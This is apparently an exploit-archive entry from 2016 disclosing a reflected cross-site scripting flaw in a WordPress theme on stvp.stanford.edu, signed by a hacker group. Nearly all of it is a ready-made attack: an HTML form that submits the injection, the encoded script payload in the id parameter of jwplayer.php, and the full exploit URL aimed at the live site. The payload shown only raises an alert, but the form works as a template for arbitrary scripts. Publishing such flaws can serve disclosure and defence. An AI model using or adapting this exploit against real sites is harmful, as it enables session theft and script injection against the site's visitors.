The WordPress Stanford theme suffers from a cross site scripting vulnerability.
b6ebd8b3e2371a264e06442e5602b62001924bd0dca16efb2961e677a1d53774
/***********************************************************************************
** Exploit Title: Stanford Wordpress Template Cross Site Scripting
Vulnerability
**
** Exploit Author: Sha4yan
**
** Vendor Homepage : http://stvp.stanford.edu/
**
** Google Dork: none
**
** Date: 2016-01-01
**
** Tested on: Ubuntu / Mozila Firefox
**
************************************************************************************
** Exploit Code:
******************
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<form method="POST"
action="http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E">
<input type="submit" value="Exploit@Sha4yan"/>
</form>
</body>
</html>
************************************************************************************
Location & Vulnerable query:
******************
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=
Add This : %22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
*************************************************************************************
** Proof:
******************
Executable script tag in Stanford's own page:
Exploit : "><script>alert(/xss/)</script>
Exploit query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
******************************************************************************************
** Persian Underground GateWay
******************************************************************************************